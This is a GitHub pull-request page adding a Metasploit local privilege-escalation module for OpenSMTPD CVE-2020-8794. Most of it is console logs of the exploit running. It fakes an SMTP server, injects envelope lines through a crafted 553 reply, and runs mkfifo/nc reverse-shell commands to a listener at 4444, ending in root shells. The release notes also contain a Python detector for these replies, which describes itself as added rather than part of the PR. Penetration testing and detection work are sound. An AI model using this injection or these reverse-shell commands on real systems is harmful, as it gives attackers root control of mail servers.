Add OpenSMTPD CVE-2020-8794 LPE exploit #13003

Merged
merged 6 commits into from Mar 4, 2020

Conversation

@wvu-r7
Member

wvu-r7 commented Feb 27, 2020

OpenSMTPD 6.6.0 on OpenBSD 6.6

msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show missing

Module options (exploit/unix/local/opensmtpd_oob_read_lpe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0</tmp/gkhbba | /bin/sh >/tmp/gkhbba 2>&1; rm /tmp/gkhbba
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.6.0 is using new grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.137:37747 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:<w
[*] Sending: 553-
553

dispatcher: local_mail
type: mda
mda-user: root
mda-exec: mkfifo /tmp/rettgqm; nc 172.16.249.1 4444 0</tmp/rettgqm | /bin/sh >/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0

[*] Disconnecting client 172.16.249.137:37747
[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
[*] Server stopped.

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
^Z
Background session 3? [y/N]  y

OpenSMTPD 6.0.4 on OpenBSD 6.3

msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
session => 2
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0</tmp/hkioy | /bin/sh >/tmp/hkioy 2>&1; rm /tmp/hkioy
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.0.4 is using old grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.138:10203 connected
[*] Exploiting old OpenSMTPD grammar for a nobody shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:<w
[*] Sending: 553-
553

type: mda
mda-method: mda
mda-usertable: <getpwnam>
mda-user: nobody
mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0</tmp/jszy | /bin/sh >/tmp/jszy 2>&1; rm /tmp/jszy; exit 0

[*] Disconnecting client 172.16.249.138:10203
[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
[*] Server stopped.

id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
uname -a
OpenBSD foo.localdomain 6.3 GENERIC#100 amd64

#12889

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch 3 times, most recently from 921f3ed to 89e5c4c Feb 27, 2020
@wvu-r7 wvu-r7 removed the needs-docs label Feb 28, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch from 103b15c to 59158d6 Feb 28, 2020
@wvu-r7 wvu-r7 marked this pull request as ready for review Feb 28, 2020
@wvu-r7
Member Author

wvu-r7 commented Mar 2, 2020

I'll see what I can do once the existing to-dos are finished. It may be desirable for CVE-2020-7247, too. Note that since this is a local exploit, TLS would be on the connect back to the fake SMTP server. The sendmail(8) interaction is all local to the target.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch 6 times, most recently from f319607 to 96269d9 Mar 2, 2020
@wvu-r7 wvu-r7 changed the title [WIP] Add OpenSMTPD CVE-2020-8794 LPE exploit Add OpenSMTPD CVE-2020-8794 LPE exploit Mar 3, 2020
@wvu-r7 wvu-r7 removed the delayed label Mar 3, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch 2 times, most recently from 77ff255 to c5f8e49 Mar 3, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch 4 times, most recently from fed8927 to e962dbd Mar 3, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch 3 times, most recently from c73d6f3 to 2377729 Mar 3, 2020
@wvu-r7
Member Author

wvu-r7 commented Mar 4, 2020

If we add TLS support, it'll be in a subsequent PR. This bucket is full.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch from 2377729 to 4078830 Mar 4, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch from 4078830 to 865d159 Mar 4, 2020
@space-r7 space-r7 self-assigned this Mar 4, 2020
@space-r7
Contributor

space-r7 commented Mar 4, 2020

Tested against OpenSMTPD v6.6.0. Code LGTM:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.169:40226) at 2020-03-04 13:18:45 -0600

whoami
opensmtpd_user
background

Background session 1? [y/N]  y
msf5 exploit(multi/handler) > use exploit/unix/local/opensmtpd_oob_read_lpe 
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > check

[!] SESSION may not be compatible with this module.
[*] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25 
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'sktnbrpuuoha@[192.168.37.1]' < /dev/null && echo true
[*] Client 192.168.37.169:39706 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[*] Sending: 553-
553

dispatcher: local_mail
type: mda
mda-user: root
mda-exec: mkfifo /tmp/pvkde; nc 192.168.37.1 4444 0</tmp/pvkde | /bin/sh >/tmp/pvkde 2>&1; rm /tmp/pvkde; exit 0

[*] Disconnecting client 192.168.37.169:39706
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.169:47937) at 2020-03-04 13:19:16 -0600
[*] Server stopped.

whoami
root
uname -a
OpenBSD foo.my.domain 6.6 GENERIC#353 amd64
@space-r7 space-r7 merged commit 5698f6e into rapid7:master Mar 4, 2020
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
@space-r7
Contributor

space-r7 commented Mar 4, 2020

Release Notes

This adds a local exploit module for an out-of-bounds read vulnerability in OpenSMTPD for versions < v6.6.4. Depending on the grammar used by OpenSMTPD, an attacker can gain privileges as either root or the nobody user.
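
The transcripts above show what the crafted reply from the fake SMTP server looks like on the wire: a multi-line `553-` reply whose trailing lines carry envelope keys (`dispatcher:`, `type: mda`, `mda-user:`, `mda-exec:` for the new grammar; `mda-method:`, `mda-usertable:`, `mda-buffer:` for the old one) instead of reply text. The following is an added detection example, not code from the PR or from Metasploit: it scans the server-to-client half of a captured outbound SMTP session from a mail host and flags lines that are not well-formed SMTP replies (RFC 5321 section 4.2.1) or that carry those envelope keys. The sample dialog is constructed from the transcripts with the command replaced by a placeholder.

```python
import re

# SMTP reply lines must start with a three-digit code followed by "-" (more
# lines follow), a space, or end of line (RFC 5321 section 4.2.1).
REPLY_RE = re.compile(r"^(\d{3})(?:([ -])|$)")

# Envelope keys that appear in the crafted 553 reply shown in the PR
# transcripts (new-grammar and old-grammar variants).
ENVELOPE_KEYS = ("dispatcher:", "type:", "mda-user:", "mda-exec:",
                 "mda-method:", "mda-usertable:", "mda-buffer:")


def find_suspicious_replies(server_lines):
    """Return findings for the server->client half of one SMTP dialog.

    server_lines: lines sent by the remote SMTP server, CRLF already stripped.
    Each finding is a tuple (line_number, reason, text).
    """
    findings = []
    open_code = None  # reply code of a multi-line reply still in progress
    for n, line in enumerate(server_lines, 1):
        key = next((k for k in ENVELOPE_KEYS if line.startswith(k)), None)
        if key:
            findings.append((n, "envelope key in server reply: " + key, line))
            continue
        m = REPLY_RE.match(line)
        if m is None:
            findings.append((n, "line without SMTP reply code", line))
            continue
        code, sep = m.group(1), m.group(2)
        if open_code is not None and code != open_code:
            findings.append((n, "reply code changed inside multi-line reply", line))
        open_code = code if sep == "-" else None
    return findings


# Constructed sample modelled on the reply in the PR transcripts; the command
# payload is replaced by a placeholder.
SAMPLE = [
    "220 mail.example.test ESMTP",
    "250 mail.example.test Hello",
    "553-",
    "553",
    "",
    "dispatcher: local_mail",
    "type: mda",
    "mda-user: root",
    "mda-exec: <command placeholder>",
]

if __name__ == "__main__":
    for n, reason, text in find_suspicious_replies(SAMPLE):
        print(f"line {n}: {reason}: {text!r}")
```

Run against the sample, it flags the empty line after the terminating `553` and the four envelope lines; a normal multi-line greeting such as `250-a` / `250 b` produces no findings.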

@wvu-r7
Member Author

wvu-r7 commented Mar 4, 2020

Thanks so much, @space-r7! I hope it didn't take up much of your time.

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/opensmtpd branch Mar 5, 2020